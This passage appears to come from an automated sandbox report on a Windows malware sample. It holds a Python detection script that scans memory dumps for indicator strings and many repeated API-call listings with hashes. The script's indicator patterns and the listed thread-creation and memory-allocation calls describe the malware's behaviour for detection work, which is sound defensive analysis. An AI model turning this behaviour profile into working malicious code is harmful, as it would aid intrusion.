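    """Match rule (assumption of this example): at least two distinct request
    fragments plus either the service-key format or the iexplore path."""
    n_http = sum(1 for k in hits if k.startswith("http_template_"))
    return n_http >= 2 and ("service_key_fmt" in hits or "iexplore_path" in hits)


# Constructed sample buffer imitating the concatenated table the report shows
# (fragments back-to-back, one repeated), followed by the two path strings.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htm"
    + b"\x00" * 8
    + b"\\Services\\%s\x00"
    + b"\xcc" * 4
    + b"\\Program Files\\Internet Explorer\\iexplore.exe\x00"
)

# Constructed benign buffer: an ordinary request line, no indicator strings.
CLEAN_DUMP = b"GET /index.html HTTP/1.1\r\n" + b"\x00" * 32


if __name__ == "__main__":
    # Usage: python scan.py <dump.sdmp>   (falls back to the constructed samples)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
        targets = [(sys.argv[1], data)]
    else:
        targets = [("sample", SAMPLE_DUMP), ("clean", CLEAN_DUMP)]
    for label, dump in targets:
        h = scan_dump(dump)
        pretty = {k: [hex(o) for o in v] for k, v in h.items()}
        print(f"{label}: hits={pretty} match={verdict(h)}")
                                                                    ```

                                                                    Offsets are relative to the start of the dump file; to map one back to a virtual address, add the dump's base (for the 00400000-based dumps listed above, the "Offset: 00400000" value) so it can be compared with the ref addresses in the API listings.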
                                                                    APIs
                                                                      • Part of subcall function 0040933D: VirtualFree.KERNEL32(?,00000000,00008000,?,00409ECE,?,00000000,00000000,00000000), ref: 0040934F
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F51
                                                                    • memcpy.MSVCRT(00000000,?,00000001,00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006), ref: 00409F60
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F88
                                                                    • memcpy.MSVCRT(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409EF2
                                                                      • Part of subcall function 00409098: memcpy.MSVCRT(?,00000006,00000006,00000000,?,00409F9D,?,00000006,?,00000000,00000000,00000000), ref: 004090C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$??2@??3@FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1750327678-0
                                                                    • Opcode ID: dcb59910b3c02c62117bc63df6d97dcbc1976871db7b907ee2b147ec10852ea4
                                                                    • Instruction ID: 22d8d4c07f5d330ebdc17b517f74b82fb851f5663cba1337fe1f311b2d6b2e64
                                                                    • Opcode Fuzzy Hash: dcb59910b3c02c62117bc63df6d97dcbc1976871db7b907ee2b147ec10852ea4
                                                                    • Instruction Fuzzy Hash: AF317671600204BADF15EF65C942AEF776AAF44304F04803EFA05B62C2DB799E159B58
                                                                    APIs
                                                                      • Part of subcall function 004091A1: _ftol.MSVCRT ref: 004091B5
                                                                    • _ftol.MSVCRT ref: 004092C7
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 004092EA
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040930E
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00409320
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual_ftol$AllocFreememcpy
                                                                    • String ID:
                                                                    • API String ID: 713764635-0
                                                                    • Opcode ID: bd355b47c837bbd9b55dde7494f61bf726d8b8a31d551e786866898b950f994b
                                                                    • Instruction ID: ed8a712ffc5b5e897abc6dad13cdbb477fb3aa1a293502dae122c880e4430215
                                                                    • Opcode Fuzzy Hash: bd355b47c837bbd9b55dde7494f61bf726d8b8a31d551e786866898b950f994b
                                                                    • Instruction Fuzzy Hash: 9011C471700305BBE7246F66CC86B5E7A98DB44794F10843FF945E62C2DBB89C408718
                                                                    APIs
                                                                      • Part of subcall function 10001155: _ftol.MSVCRT ref: 10001169
                                                                    • _ftol.MSVCRT ref: 1000127B
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 1000129E
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 100012C2
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 100012D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual_ftol$AllocFreememcpy
                                                                    • String ID:
                                                                    • API String ID: 713764635-0
                                                                    • Opcode ID: d8020b58846e36b2c0ef021d95b2744d93c70034684acec6267bbf9db4b80111
                                                                    • Instruction ID: ae797aaf9a948ef566d161c54d2cab6ded1a4e544644c1f6e6cf1d9973df26f8
                                                                    • Opcode Fuzzy Hash: d8020b58846e36b2c0ef021d95b2744d93c70034684acec6267bbf9db4b80111
                                                                    • Instruction Fuzzy Hash: A211E375700704ABF714DB65CC86BDEBAE9EF447E1F10842EF606D6284DA70A8108754
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(10012D70), ref: 004123E0
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00412441
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412460
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041246B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$CloseFreeHandleLoadlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 2117189956-0
                                                                    • Opcode ID: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction ID: b1d2a2a58fa4efb8e8d95d1ca76e0beb6e446735ff03406843662ab7cb54be78
                                                                    • Opcode Fuzzy Hash: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction Fuzzy Hash: E9117331D01228BBEB119B65CD88FEFBFB8EF45751F004055F904E2240DB78EA85CA64
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 1000331F
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000335C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000335F
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003050,00000000,00000000,00000000), ref: 10003387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 65a164409126ecdcc5d84dcb1117f02482ac7ee385188e2975e00b1706ae25a7
                                                                    • Instruction ID: 3b4a5e44c058e12d31883cc5832a5cf70e53003bd9e5b9d04229cb0ccb599ed4
                                                                    • Opcode Fuzzy Hash: 65a164409126ecdcc5d84dcb1117f02482ac7ee385188e2975e00b1706ae25a7
                                                                    • Instruction Fuzzy Hash: 0901DBB5605259AFF700DF69DCC4C9B7BECEB492E87128036F904D7225DA34DD808BA0
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 1000331F
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000335C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000335F
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003050,00000000,00000000,00000000), ref: 10003387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 935de12c3884e030f0c6067258176b32390a294feaa5fd53b1ff34555a16aa78
                                                                    • Instruction ID: 5a740cae9051c5789e01d529072efcaaec96b2ae735acb36f2d1613ba77a2bd6
                                                                    • Opcode Fuzzy Hash: 935de12c3884e030f0c6067258176b32390a294feaa5fd53b1ff34555a16aa78
                                                                    • Instruction Fuzzy Hash: 79010CB5505259BFF700DF68DCC4C9B7BECEB492E8712802AF904D7225DA34DD808BA0
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10003BB5
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003BE2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003BE5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000038D9,00000000,00000000,00000000), ref: 10003C0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: de554cc3106f12f13f48865c63481c8dce2056c240203bdb69b24114600269ac
                                                                    • Instruction ID: 8a595a9359ace313486d68bf63f064f2dbf0705f10ba0b366fc4a4c6b6156981
                                                                    • Opcode Fuzzy Hash: de554cc3106f12f13f48865c63481c8dce2056c240203bdb69b24114600269ac
                                                                    • Instruction Fuzzy Hash: BC01E8B5605259BEF7009F68DDC0CAB7B9CEB852E87128576FA04D6225DA31DC848BB0
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002FE9
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003016
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003019
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002DAB,00000000,00000000,00000000), ref: 1000303F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 3d460dcf4820d85662d129f0b962bba6f95952237c51b4056d27ef57a1556d13
                                                                    • Instruction ID: a4c7ccd63960f261a876490d46d9b0fe0f61bc29c67e8ed61f9ccbef9d70629c
                                                                    • Opcode Fuzzy Hash: 3d460dcf4820d85662d129f0b962bba6f95952237c51b4056d27ef57a1556d13
                                                                    • Instruction Fuzzy Hash: BC01FFB550525D7EF700DF64DCC4CAB7B9CEB852E87114536FA0496225D634DD848670
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0040D828
                                                                    • SendMessageA.USER32(?,0000000D,00000400,00000000), ref: 0040D85D
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040D86A
                                                                    • strstr.MSVCRT ref: 0040D88E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageSendVisibleWindowlstrlenstrstr
                                                                    • String ID:
                                                                    • API String ID: 2582741326-0
                                                                    • Opcode ID: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction ID: d235481b9b92231afd6427172e1103f9c0cec4a32e5d7be8947e76bf447d6a07
                                                                    • Opcode Fuzzy Hash: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction Fuzzy Hash: 86017572A04229AEFB107BA4DC49FA67BACEF04344F148477E705F50D0DBB9A9458F58
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100048F8
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004925
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004928
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000047B2,00000000,00000000,00000000), ref: 1000494E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: fa757a253a8fb56487e7ab44d92704aef3d27e44b58d9174f499b71298464214
                                                                    • Instruction ID: f54ba1f4d68c54ff34d6b46a82bcb8a2118237904e40f0b8388af11fa433a658
                                                                    • Opcode Fuzzy Hash: fa757a253a8fb56487e7ab44d92704aef3d27e44b58d9174f499b71298464214
                                                                    • Instruction Fuzzy Hash: 660128B5505259BEF7009F69DCC4CAB7B9CEB852E83124036FA0496225CA30DC808AA0
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100048F8
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004925
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004928
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000047B2,00000000,00000000,00000000), ref: 1000494E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 984ab068ead804bdbad976fb3c11e0140bbe1b88babf3aa644fc67727f65b7f5
                                                                    • Instruction ID: 91f668e4c2e07200796a6330d9c86530fccc4c8c679d771c63903f968a300784
                                                                    • Opcode Fuzzy Hash: 984ab068ead804bdbad976fb3c11e0140bbe1b88babf3aa644fc67727f65b7f5
                                                                    • Instruction Fuzzy Hash: D40146F550525DBFF7009F64DCC0CAB7BECEB852E83124036FA0497225CA30DC808AA0
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10003BB5
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003BE2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003BE5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000038D9,00000000,00000000,00000000), ref: 10003C0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 3cdd8863520d37c2d208e99fa3a5198f012113f8e60e02a40381e9bbe3d9f00f
                                                                    • Instruction ID: 64f11de6cb9980ccf9cb126778a316ce0da3c38ecdc3d1121efab58b0cbb8362
                                                                    • Opcode Fuzzy Hash: 3cdd8863520d37c2d208e99fa3a5198f012113f8e60e02a40381e9bbe3d9f00f
                                                                    • Instruction Fuzzy Hash: 6301F6B5505259BFF700DF68DDC0CAB7BACEB852E87128566F90496225DA31EC808BB0
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002FE9
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003016
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003019
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002DAB,00000000,00000000,00000000), ref: 1000303F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 205a226a8ba8a2211124f27a9ee41849a0d46b67b8944d1ede31a6de25eb454f
                                                                    • Instruction ID: 9ef6278120636b26c595fc5a858eab384134e2c6a33bf4d69654459df797d562
                                                                    • Opcode Fuzzy Hash: 205a226a8ba8a2211124f27a9ee41849a0d46b67b8944d1ede31a6de25eb454f
                                                                    • Instruction Fuzzy Hash: 0D011DB550625DBFF700DF64DCC4CAB7BECEB852E87124526F90497225DA34DD808A70
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
